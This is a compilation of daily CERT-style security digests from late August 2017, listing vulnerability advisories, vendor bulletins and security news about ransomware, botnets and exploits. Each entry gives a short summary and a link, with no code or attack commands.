∗∗∗ IBM Security Bulletin: IBM PowerVC is impacted by OpenStack Compute denial of service vulnerability (CVE-2016-7498) ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=nas8N1022227
∗∗∗ IBM Security Bulletin: Vulnerability in libtirpc affects Power Hardware Management Console (CVE-2017-8779) ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=nas8N1022176
∗∗∗ IBM Security Bulletin: Vulnerabilities in BIND affect Power Hardware Management Console ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=nas8N1022177
∗∗∗ IBM Security Bulletin: IBM PowerVC is impacted by python oslo.middleware package information disclosure (CVE-2017-2592) ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=nas8N1022229
∗∗∗ IBM Security Bulletin: IBM PowerVC is impacted by OpenStack Glance server-side request forgery (CVE-2017-7200) ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=nas8N1022228
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM® Java SDK affect WebSphere Application Server July 2017 CPU that is bundled with IBM WebSphere Application Server Patterns and IBM WebSphere Application Server for Cloud. ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22007046
∗∗∗ IBM Security Bulletin: Multiple Vulnerabilities in IBM® Java SDK affect WebSphere Application Server July 2017 CPU ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22007002
=====================
= End-of-Day report =
=====================
Timeframe: Dienstag 29-08-2017 18:00 − Mittwoch 30-08-2017 18:00
Handler: Robert Waldner
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ WireX: Google removes 300 DDoS apps from the Play Store ∗∗∗
---------------------------------------------
Google has shut down a DDoS botnet made up of Android devices, removing
300 apps from the Play Store in the process. Around 70,000 smartphones
were infected. (DoS, Virus)
---------------------------------------------
https://www.golem.de/news/wirex-google-entfernt-300-ddos-apps-aus-dem-plays…
∗∗∗ Introducing WhiteBear ∗∗∗
---------------------------------------------
As a part of our Kaspersky APT Intelligence Reporting subscription,
customers received an update in mid-February 2017 on some interesting
APT activity that we called WhiteBear. It is a parallel project or
second stage of the Skipper Turla cluster of activity documented in
another private report. Like previous Turla activity, WhiteBear
leverages compromised websites and hijacked satellite connections for
command and control (C2) infrastructure.
---------------------------------------------
http://securelist.com/introducing-whitebear/81638/
∗∗∗ Security baseline for Windows 10 “Creators Update” (v1703) – FINAL ∗∗∗
---------------------------------------------
Microsoft is pleased to announce the final release of the recommended
security configuration baseline settings for Windows 10 “Creators
Update,” also known as version 1703, “Redstone 2,” or RS2. The
downloadable attachment to this blog post includes importable GPOs,
tools for applying the GPOs, custom ADMX files for Group Policy
settings, and all the settings in spreadsheet...
---------------------------------------------
https://blogs.technet.microsoft.com/secguide/2017/08/30/security-baseline-f…
∗∗∗ Proof that HMAC-DRBG has No Back Doors ∗∗∗
---------------------------------------------
New research: "Verified Correctness and Security of mbedTLS HMAC-DRBG,"
by Katherine Q. Ye, Matthew Green, Naphat Sanguansin, Lennart Beringer,
Adam Petcher, and Andrew W. Appel. Abstract: We have formalized the
functional specification of HMAC-DRBG (NIST 800-90A), and we have
proved its cryptographic security -- that its output is pseudorandom --
using a hybrid game-based proof.
---------------------------------------------
https://www.schneier.com/blog/archives/2017/08/proof_that_hmac.html
=====================
= Advisories =
=====================
∗∗∗ Update to Security Bulletin (APSB17-24) ∗∗∗
---------------------------------------------
The Security Bulletin (APSB17-24) published on August 8 regarding
updates for Adobe Acrobat and Reader has been updated to reflect the
availability of new updates as of August 29. The August 29 updates
resolve a functional regression with XFA forms functionality …
---------------------------------------------
https://blogs.adobe.com/psirt/?p=1484
∗∗∗ DFN-CERT-2017-1525: Wireshark: Multiple vulnerabilities allow
denial-of-service attacks ∗∗∗
---------------------------------------------
Multiple vulnerabilities in Wireshark can be exploited by a remote,
unauthenticated attacker for various denial-of-service (DoS) attacks.
Exploiting the vulnerabilities requires the processing of specially
crafted packets or packet-trace files with the dissectors for IrCOMM,
Modbus, Profinet I/O or MSDP.
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2017-1525/
∗∗∗ DFN-CERT-2017-1523: Libgcrypt: A vulnerability allows information
disclosure ∗∗∗
---------------------------------------------
A vulnerability in Libgcrypt allows a local, simply authenticated
attacker to read out private key material. The GnuPG project has fixed
the vulnerability in versions 1.7.9 and 1.8.1. The source code of these
versions is available for download.
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2017-1523/
∗∗∗ Multiple vulnerabilities in RubyGems ∗∗∗
---------------------------------------------
The following vulnerabilities have been reported.
* a DNS request hijacking vulnerability
* an ANSI escape sequence vulnerability
* a DoS vulnerability in the query command
* a vulnerability in the gem installer that allowed a malicious gem to
overwrite arbitrary files
---------------------------------------------
https://www.ruby-lang.org/en/news/2017/08/29/multiple-vulnerabilities-in-ru…
∗∗∗ Cisco unveils LabVIEW code execution flaw that won’t be patched ∗∗∗
---------------------------------------------
LabVIEW, the widely used system design and development platform
developed by National Instruments, sports a memory corruption
vulnerability that could lead to code execution. LabVIEW is commonly
used for building data acquisition, instrument control, and industrial
automation systems on a variety of operating systems: Windows, macOS,
Linux and Unix. The vulnerability (CVE-2017-2779) was discovered by
Cory Duplantis of Cisco Talos earlier this year, and reported to the
company.
---------------------------------------------
https://www.helpnetsecurity.com/2017/08/30/labview-code-execution-flaw/
∗∗∗ Abbott Laboratories’ Accent/Anthem, Accent MRI, Assurity/Allure,
and Assurity MRI Pacemaker Vulnerabilities ∗∗∗
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSMA-17-241-01
∗∗∗ AzeoTech DAQFactory ∗∗∗
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-17-241-01
∗∗∗ Advantech WebAccess ∗∗∗
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-17-241-02
∗∗∗ Security Advisory - Improper Authentication Vulnerability in The
FusionSphere OpenStack ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2017/huawei-sa-20170830-…
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK
affect IBM Algo Credit Manager ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22007392
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities may affect IBM®
SDK, Java™ Technology Edition ∗∗∗
---------------------------------------------
https://www.ibm.com/support/docview.wss?uid=swg22006695
∗∗∗ IBM Security Bulletin: Vulnerabilities in httpd affect Power
Hardware Management Console ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=nas8N1022175
∗∗∗ IBM Security Bulletin: Vulnerability in IBM WebSphere Application
Server affects Power Hardware Management Console (CVE-2017-1194) ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=nas8N1022178
∗∗∗ IBM Security Bulletin: IBM Transformation Extender Advanced and IBM
Standards Processing Engine are susceptible to a vulnerability in 10x
(CVE-2017-1152) ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22004796
∗∗∗ ImageMagick Heap Overflow in TracePoint() in Processing Files Lets
Remote Users Execute Arbitrary Code ∗∗∗
---------------------------------------------
http://www.securitytracker.com/id/1039246
∗∗∗ SSA-535640 (Last Update 2017-08-30): Vulnerability in Industrial
Products ∗∗∗
---------------------------------------------
https://www.siemens.com/cert/pool/cert/siemens_security_advisory_ssa-535640…
∗∗∗ SSA-771218 (Last Update 2017-08-30): Vulnerability in 7KM PAC Switched
Ethernet PROFINET expansion module from the SENTRON portfolio ∗∗∗
---------------------------------------------
https://www.siemens.com/cert/pool/cert/siemens_security_advisory_ssa-771218…
∗∗∗ SSA-087240 (Last Update 2017-08-30): Vulnerabilities in SIEMENS
LOGO! ∗∗∗
---------------------------------------------
https://www.siemens.com/cert/pool/cert/siemens_security_advisory_ssa-087240…
∗∗∗ HPESBGN03765 rev.2 - HPE LoadRunner and HPE Performance Center,
Remote Disclosure of Information ∗∗∗
---------------------------------------------
https://h20565.www2.hpe.com/portal/site/hpsc/template.PAGE/action.process/p…
=====================
= End-of-Day report =
=====================
Timeframe: Montag 28-08-2017 18:00 − Dienstag 29-08-2017 18:00
Handler: Stephan Richter
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Metadata From IoT Traffic Exposes In-Home User Activity ∗∗∗
---------------------------------------------
Metadata from web traffic generated by smart devices installed in a home can reveal quite a lot of information about the owners habits and lifestyle. [...]
---------------------------------------------
https://www.bleepingcomputer.com/news/technology/metadata-from-iot-traffic-…
∗∗∗ "At the moment the customer bears all the costs and risks" ∗∗∗
---------------------------------------------
The absolute minimum must be that the vendor provides patches for all security vulnerabilities for the entire period of use of the software. If it were up to me, the customer would be paid a flat rate per workstation and per day without a patch, and not from the time the security hole became publicly known, but, if that was earlier, from the time the vendor knew about it.
---------------------------------------------
https://www.eco.de/2017/news/die-ganzen-kosten-und-risiken-traegt-im-moment…
∗∗∗ Android and Windows: MTP bug makes files disappear ∗∗∗
---------------------------------------------
Be careful with Android devices connected via USB to a PC running Windows 10: during harmless clean-up work, photos and other files can be irretrievably lost. Almost all Android devices are affected, except newer ones from Samsung.
---------------------------------------------
https://heise.de/-3815535
∗∗∗ Tech Firms Team Up to Take Down ‘WireX’ Android DDoS Botnet ∗∗∗
---------------------------------------------
A half dozen technology and security companies -- some of them competitors -- issued the exact same press release today. This unusual level of cross-industry collaboration caps a successful effort to dismantle WireX, an extraordinary new crime machine comprising tens of thousands of hacked Android mobile devices that was used this month to launch a series of massive cyber attacks. Experts involved in the takedown warn that WireX marks the emergence of a new class of attack tools that are more
---------------------------------------------
https://krebsonsecurity.com/2017/08/tech-firms-team-up-to-take-down-wirex-a…
∗∗∗ BSI study analysing the Linux random number generator is being continued ∗∗∗
---------------------------------------------
As part of a long-term study, the German Federal Office for Information Security (BSI) has been examining the cryptographic suitability of the Linux random number generator "/dev/random" since 2012. The current analysis report covers both the current and all previous Linux kernels and is available for download in English on the BSI website.
---------------------------------------------
https://www.bsi.bund.de/DE/Presse/Pressemitteilungen/Presse2017/Studie_Linu…
=====================
= Advisories =
=====================
∗∗∗ DSA-3958 fontforge - security update ∗∗∗
---------------------------------------------
It was discovered that FontForge, a font editor, did not correctly validate its input. An attacker could use this flaw by tricking a user into opening a maliciously crafted OpenType font file, thus causing a denial-of-service via application crash, or execution of arbitrary code.
---------------------------------------------
https://www.debian.org/security/2017/dsa-3958
∗∗∗ DSA-3957 ffmpeg - security update ∗∗∗
---------------------------------------------
Several vulnerabilities have been discovered in FFmpeg, a multimedia player, server and encoder. These issues could lead to Denial-of-Service and, in some situations, the execution of arbitrary code.
---------------------------------------------
https://www.debian.org/security/2017/dsa-3957
∗∗∗ VU#403768: Akeo Consulting Rufus fails to update itself securely ∗∗∗
---------------------------------------------
http://www.kb.cert.org/vuls/id/403768
∗∗∗ DFN-CERT-2017-1514: MISP: A vulnerability allows a cross-site scripting attack ∗∗∗
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2017-1514/
∗∗∗ DFN-CERT-2017-1512: OpenSSL: A vulnerability allows the display of false information ∗∗∗
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2017-1512/
∗∗∗ DFN-CERT-2017-1515: Ghostscript: Multiple vulnerabilities allow various denial-of-service attacks ∗∗∗
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2017-1515/
∗∗∗ DFN-CERT-2017-1517: SQLite: A vulnerability allows a denial-of-service attack ∗∗∗
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2017-1517/
∗∗∗ Security Advisory - Two Vulnerabilities in Smart Phones ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2017/huawei-sa-20170807-…
∗∗∗ Security Advisory - App Lock Bypass Vulnerability in Huawei Mobile Phones ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2017/huawei-sa-20170829-…
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK 7 affect IBM Systems Director. ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=isg3T1025659
∗∗∗ Pulse Connect Secure Access Control Flaw in diag.cgi Lets Remote Users Conduct Cross-Site Request Forgery Attacks ∗∗∗
---------------------------------------------
http://www.securitytracker.com/id/1039242
=====================
= End-of-Day report =
=====================
Timeframe: Freitag 25-08-2017 18:00 − Montag 28-08-2017 18:00
Handler: Robert Waldner
Co-Handler: Alexander Riepl
=====================
= News =
=====================
=====================
= Advisories =
=====================
∗∗∗ Disabling Intel ME 11 via undocumented mode ∗∗∗
---------------------------------------------
... researchers have delved deep into the internal architecture of Intel
Management Engine (ME) 11, revealing a mechanism that can disable Intel
ME after hardware is initialized and the main processor starts. In this
article, we describe how we discovered this undocumented mode and how
it is connected with the U.S. government's High Assurance Platform (HAP)
program.
---------------------------------------------
http://blog.ptsecurity.com/2017/08/disabling-intel-me.html
∗∗∗ Security Advisory - Two Vulnerabilities in Smart Phones ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2017/huawei-sa-20170807-01-smartphone-en
∗∗∗ IBM Security Bulletin: OpenSSL Security Advisory [22 Sep 2016] ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=ssg1S1010571
∗∗∗ IBM Security Bulletin: Vulnerabilities in OpenSSL affect IBM
Sametime Community Server ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22006228
∗∗∗ IBM Security Bulletin: IBM Cognos Analytics is affected by multiple
vulnerabilities ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22007242
∗∗∗ IBM Security Bulletin: A vulnerability in IBM Sametime Web Player
(CVE-2016-2980) ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22006447
∗∗∗ IBM Security Bulletin: Security vulnerabilities in IBM Sametime
Connect client (CVE-2016-0243, CVE-2016-2974) ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22006444
∗∗∗ IBM Security Bulletin: Vulnerabilities in OpenSSL affect IBM Cisco
SAN switches and directors (CVE-2016-2108, CVE-2016-2107,
CVE-2016-2105, CVE-2016-2106, CVE-2016-2109, CVE-2016-2176) ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=ssg1S1010566
∗∗∗ IBM Security Bulletin: Various Security Vulnerabilities in IBM
Sametime Proxy Server ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22006441
=====================
= End-of-Day report =
=====================
Timeframe: Donnerstag 24-08-2017 18:00 − Freitag 25-08-2017 18:00
Handler: Olaf Schwarz
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Researcher Releases Fully Working Exploit Code for iOS Kernel Vulnerability ∗∗∗
---------------------------------------------
Adam Donenfeld, a researcher with mobile security firm Zimperium, has published today proof-of-concept code for zIVA — a kernel exploit that affects iOS 10.3.1 and previous versions.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/researcher-releases-fully-wo…
∗∗∗ New EMPTY CryptoMix Ransomware Variant Released ∗∗∗
---------------------------------------------
Today, MalwareHunterTeam discovered a new variant of the CryptoMix ransomware that is appending the .EMPTY extension to encrypted file names. Considering that the previous variant used ERROR as the previous extension and now uses EMPTY, it is clear that the developers are running out of extensions to use.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/new-empty-cryptomix-ransomwa…
∗∗∗ Mobile malware factories: Android apps for creating ransomware ∗∗∗
---------------------------------------------
Mobile ransomware can now be created automatically without the need to write code. Having little to no coding experience is no longer a problem for wannabe mobile malware authors, thanks to Trojan Development Kits (TDKs). Criminals can now install an app that will allow them to quickly and easily create Android ransomware with their own devices.
---------------------------------------------
https://www.symantec.com/connect/blogs/mobile-malware-factories-android-app…
∗∗∗ Analysis of Ronggolawe Ransomware and How to Block It ∗∗∗
---------------------------------------------
... Web server ransomware is not new. In fact, we witnessed the first evidence of it back in 2015 and most recently in the well-known attack aimed at the South Korean web hosting company NAYANA. Unfortunately, today ransomware targeted at web servers is even more popular, especially given the availability of open source malware easily found in public repositories such as GitHub. Most recently we have seen reports of a new web server ransomware called Ronggolawe, the code name for AwesomeWare.
---------------------------------------------
https://www.imperva.com/blog/2017/08/ronggolawe-ransomware-how-to-block-it/
∗∗∗ The Adventure of the Final Intel AMT Problem ∗∗∗
---------------------------------------------
It's high time to learn how cunning cyber criminals can use Intel AMT's powerful capabilities to achieve their malicious goals. See the captivating story of hacking Intel AMT with all its twists and turns and awe-inspiring details with your own eyes. The freshest and the hottest presentation “MythBusters: CVE-2017-5689 – How Intel AMT could be broken completely” from HITB 2017.
---------------------------------------------
https://embedi.com/news/adventure-final-intel-amt-problem
∗∗∗ Sophos UTM: update takes care of old and new security vulnerabilities ∗∗∗
---------------------------------------------
Sophos UTM contains several vulnerabilities. A fixed version is available for download.
---------------------------------------------
https://heise.de/-3812308
∗∗∗ Android Oreo: these are the security improvements in Android 8.0 ∗∗∗
---------------------------------------------
Google is hardening Android with Google Play Protect, protective features for the system UI, stricter rules for dynamically loaded code from third-party sources and extended isolation of browser processes.
---------------------------------------------
https://heise.de/-3812341
=====================
= Advisories =
=====================
∗∗∗ ZDI-17-697: (0Day) Delta Industrial Automation WPLSoft dvp File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability ∗∗∗
---------------------------------------------
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Delta Industrial Automation WPLSoft. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-17-697/
∗∗∗ ESB-2017.2137 - [Appliance] WPLSoft, ISPSoft and PMSoft ∗∗∗
---------------------------------------------
This bulletin contains ten (10) Zero Day Initiative security advisories.
---------------------------------------------
https://www.auscert.org.au/bulletins/51578/print
∗∗∗ Westermo MRD-305-DIN, MRD-315, MRD-355, and MRD-455 ∗∗∗
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-17-236-01
∗∗∗ Rockwell Automation Allen-Bradley Stratix and ArmoStratix ∗∗∗
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-17-208-04
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM MQ Light ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22007508
=====================
= End-of-Day report =
=====================
Timeframe: Mittwoch 23-08-2017 18:00 − Donnerstag 24-08-2017 18:00
Handler: Olaf Schwarz
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ 90% of Companies Get Attacked with Three-Year-Old Vulnerabilities ∗∗∗
---------------------------------------------
A Fortinet report released this week highlights the importance of keeping systems up to date, or at least only a few release cycles behind the current version; the latter is not recommended, but it is still better than leaving systems unpatched for years.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/90-percent-of-companies-get-…
∗∗∗ Whatsapp and Signal: Zerodium offers 500,000 US dollars for messenger exploits ∗∗∗
---------------------------------------------
Government demand for security vulnerabilities usable for lawful interception at the source (Quellen-TKÜ) is apparently having an effect. Vulnerabilities in Whatsapp, Signal and other messengers are now rewarded better than code execution in Windows.
---------------------------------------------
https://www.golem.de/news/whatsapp-und-signal-zerodium-bietet-500-000-us-do…
∗∗∗ Deprecated, Insecure Apple Authorization API Can Be Abused to Run Code at Root ∗∗∗
---------------------------------------------
An insecure Apple authorization API is used by numerous popular third-party application installers and can be abused by attackers to run code as root.
---------------------------------------------
http://threatpost.com/deprecated-insecure-apple-authorization-api-can-be-ab…
∗∗∗ Decrypting NotPetya/Petya: Tools for Recovering Your MFT After an Attack ∗∗∗
---------------------------------------------
In this blog post, we are making our findings, and tools, for decrypting NotPetya/Petya available to the general public. With the aid of the supplied tools, almost all of the Master File Table (MFT) can be successfully recovered within minutes.
---------------------------------------------
https://www.crowdstrike.com/blog/decrypting-notpetya-tools-for-recovering-y…
∗∗∗ I'm giving up on HPKP ∗∗∗
---------------------------------------------
HTTP Public Key Pinning is a very powerful standard that allows a host to instruct a browser to only accept certain public keys when communicating with it for a given period of time. Whilst HPKP can offer a lot of protection, it can also cause a lot of harm too.
---------------------------------------------
https://scotthelme.co.uk/im-giving-up-on-hpkp/
∗∗∗ Crystal Finance Millennium used to spread malware ∗∗∗
---------------------------------------------
[...] it was revealed the Crystal Finance Millennium website was indeed hacked, and serving three different flavors of malware. In this short blog post, we'll take a look at the malware variants that were distributed, and provide minimal background.
---------------------------------------------
https://bartblaze.blogspot.de/2017/08/crystal-finance-millennium-used-to.ht…
∗∗∗ Malware circulating via Facebook Messenger attacks Windows and macOS ∗∗∗
---------------------------------------------
Security researchers are currently warning about a scam that aims to trick Facebook users into installing trojanised fake software.
---------------------------------------------
https://heise.de/-3811842
∗∗∗ Critical security vulnerability in HPE iLO: "Act as quickly as possible" ∗∗∗
---------------------------------------------
The Integrated Lights-out 4 (iLO 4) management software of HP ProLiant servers contains a security vulnerability through which attackers can remotely execute malicious code without having to log in.
---------------------------------------------
https://heise.de/-3811873
=====================
= Advisories =
=====================
∗∗∗ Cisco Meeting Server Command Injection and Privilege Escalation Vulnerability ∗∗∗
---------------------------------------------
A vulnerability in the CLI command-parsing code of Cisco Meeting Server could allow an authenticated, local attacker to perform command injection and escalate their privileges to root. The attacker must first authenticate to the application with valid administrator credentials. The vulnerability is due to insufficient validation of user-supplied input at the CLI for certain commands.
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ DFN-CERT-2017-1497: Cacti: Two vulnerabilities allow cross-site scripting attacks ∗∗∗
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2017-1497/
∗∗∗ IBM Security Bulletin: A vulnerability in IBM Java SDK affects Sametime Community (CVE-2016-2183) ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22006212
∗∗∗ IBM Security Bulletin: Vulnerability found in OpenSSL release used by Windows and z/OS Security Identity Adapters ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22007428
∗∗∗ IBM Security Bulletin: Various Security vulnerabilities in IBM Sametime Media Server (CVE-2016-2970, CVE-2016-0729, CVE-2016-4449) ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22006233
∗∗∗ HPESBHF03769 rev.1 - HPE Integrated Lights-out 4 (iLO 4) Multiple Remote Vulnerabilities ∗∗∗
---------------------------------------------
https://h20566.www2.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=e…
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 22-08-2017 18:00 − Wednesday 23-08-2017 18:00
Handler: Olaf Schwarz
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ ROPEMAKER Lets Attackers Change Your Emails After Delivery ∗∗∗
---------------------------------------------
A new email attack scenario nicknamed ROPEMAKER allows a threat actor to change the content of emails received by targets via remote CSS files.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/ropemaker-lets-attackers-cha…
∗∗∗ Google Play Store Security Scans Tricked by ...Sigh... In-Dev Malware ∗∗∗
---------------------------------------------
Google has yet to remove two apps infected with dangerous malware that are currently still available for download via the official Google Play Store.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/google-play-store-security-s…
∗∗∗ Malicious script dropping an executable signed by Avast?, (Wed, Aug 23rd) ∗∗∗
---------------------------------------------
Yesterday, I found an interesting sample that I started to analyze... It reached my spam trap attached to an email in Portuguese with the subject: "Venho por meio desta solicitar orçamento dos produtos” ("I hereby request the products budget”).
---------------------------------------------
https://isc.sans.edu/diary/rss/22748
∗∗∗ Apple iCloud Keychain easily slurped, ElcomSoft says ∗∗∗
---------------------------------------------
Credentials stored in the cloud succumb to forensic software. ElcomSoft, the Russia-based maker of forensic software, has managed to find a way to access the data stored in Apple's iCloud Keychain, if Apple ID account credentials are available.
---------------------------------------------
http://www.theregister.co.uk/2017/08/22/apple_icloud_keychain_easily_slurpe…
∗∗∗ Is the Power Grid Getting More Vulnerable to Cyber Attacks? ∗∗∗
---------------------------------------------
Rising computerization opens doors for increasingly aggressive adversaries, but defenses are better than many might think.
---------------------------------------------
https://www.scientificamerican.com/article/is-the-power-grid-getting-more-v…
∗∗∗ Ukrainian Security Firm Warns of Another Massive Global Cyberattack ∗∗∗
---------------------------------------------
A new wave of cyberattacks could be launched as soon as this week, Ukrainian security firm ISSP warns, pointing out that the main objective would be taking down networks on August 24, when Ukraine celebrates its Independence Day.
---------------------------------------------
http://news.softpedia.com/news/ukrainian-security-firm-warns-massive-global…
∗∗∗ Google removes 500 potential spyware apps from the app store ∗∗∗
---------------------------------------------
A software development kit for ad placements allegedly includes snooping functions. Android apps equipped with it account for more than 100 million downloads, security researchers warn.
---------------------------------------------
https://heise.de/-3810366
∗∗∗ Background: Hardware fuzzing: tracking down backdoors and bugs in CPUs ∗∗∗
---------------------------------------------
A processor fuzzer analyses hardware that one normally has to trust blindly. In its first test runs it found issues on almost all architectures and discovered, for example, undocumented CPU instructions. Sandsifter is free and openly available; the author even helps with the analysis.
---------------------------------------------
https://heise.de/-3809408
=====================
= Advisories =
=====================
∗∗∗ DSA-3952 libxml2 - security update ∗∗∗
---------------------------------------------
Several vulnerabilities were discovered in libxml2, a library providing support to read, modify and write XML and HTML files. A remote attacker could provide a specially crafted XML or HTML file that, when processed by an application using libxml2, would cause a denial-of-service against the application, information leaks, or potentially, the execution of arbitrary code with the privileges of the user running the application.
---------------------------------------------
https://www.debian.org/security/2017/dsa-3952
∗∗∗ Automated Logic Corporation WebCTRL, i-VU, SiteScan ∗∗∗
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-17-234-01
∗∗∗ SpiderControl SCADA Web Server ∗∗∗
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-17-234-03
∗∗∗ SpiderControl SCADA MicroBrowser ∗∗∗
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-17-234-02
∗∗∗ Security Advisory - Two Command Injection Vulnerabilities in The FusionSphere OpenStack ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2017/huawei-sa-20170823-…
∗∗∗ IBM Security Bulletin: IBM MQ Appliance is affected by a Network Security Services (NSS) vulnerability (CVE-2017-5461) ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22005055
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Rational Application Developer for WebSphere Software ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22007464
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in OpenSource NTP affects IBM Netezza Host Management ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22002233
∗∗∗ Multiple GNU Binutils vulnerabilities ∗∗∗
---------------------------------------------
https://support.f5.com/csp/article/K23729200
=====================
= End-of-Day report =
=====================
Timeframe: Monday 21-08-2017 18:00 − Tuesday 22-08-2017 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Stolen nude photos of ski star Lindsey Vonn online ∗∗∗
---------------------------------------------
Unknown perpetrators hacked the phone of US ski star Lindsey Vonn (32) and stole nude photos of her and her ex-boyfriend Tiger Woods (41).
---------------------------------------------
https://futurezone.at/digital-life/gestohlene-nacktfotos-von-ski-star-linds…
∗∗∗ Insecure passwords: attacks on Microsoft accounts up 300 percent ∗∗∗
---------------------------------------------
Many users still have bad passwords and reuse them across several accounts. This emerges from Microsoft's own security analysis, which presents trends from the enterprise and consumer business.
---------------------------------------------
https://www.golem.de/news/unsichere-passwoerter-angriffe-auf-microsoft-kont…
∗∗∗ Enigma ICO Heist Robs Nearly $500,000 in Ethereum From Investors ∗∗∗
---------------------------------------------
Crypto's fine and good, but make sure you're looking after the basics.
---------------------------------------------
https://www.wired.com/story/enigma-ico-ethereum-heist
∗∗∗ Who’s Blocked by Bad Guys? ∗∗∗
---------------------------------------------
Just a quick post about an interesting file found in a phishing kit. Bad guys use common techniques to prevent crawlers, scanners or security companies from accessing their pages. Usually, ..
---------------------------------------------
https://blog.rootshell.be/2017/08/21/whos-blocked-bad-guys/
∗∗∗ Ransomware trojan WannaCry has struck again ∗∗∗
---------------------------------------------
Apparently LG failed to install important security patches on some service systems, and WannaCry infected various computers of the company in South Korea. However, no major damage is said to have occurred.
---------------------------------------------
https://heise.de/-3809790
∗∗∗ Criminals steal phone numbers of Bitcoin investors ∗∗∗
---------------------------------------------
They ask mobile operators to transfer the number to a new device – often resulting in losses in the millions
---------------------------------------------
http://derstandard.at/2000062971633
∗∗∗ Hackers threaten to put "Game of Thrones" finale online in advance ∗∗∗
---------------------------------------------
HBO has so far refused to pay a ransom – two of six episodes had previously leaked onto the net
---------------------------------------------
http://derstandard.at/2000062960237
∗∗∗ Fraud: mobile operators warn of "ping calls" ∗∗∗
---------------------------------------------
Behind an unknown number on the phone display there is sometimes a fraudster
---------------------------------------------
http://derstandard.at/2000062990431
=====================
= Advisories =
=====================
∗∗∗ Security update: update Thunderbird and configure it securely ∗∗∗
---------------------------------------------
Several vulnerabilities in Mozilla Thunderbird allow a remote, unauthenticated attacker to execute arbitrary code, bypass security measures, display false information and carry out various denial-of-service (DoS) attacks.
---------------------------------------------
https://www.kuketz-blog.de/sicherheitsupdate-thunderbird-updaten-und-sicher…
∗∗∗ DSA-3949 augeas - security update ∗∗∗
---------------------------------------------
https://www.debian.org/security/2017/dsa-3949
∗∗∗ Multiple vulnerabilities in Progress Sitefinity ∗∗∗
---------------------------------------------
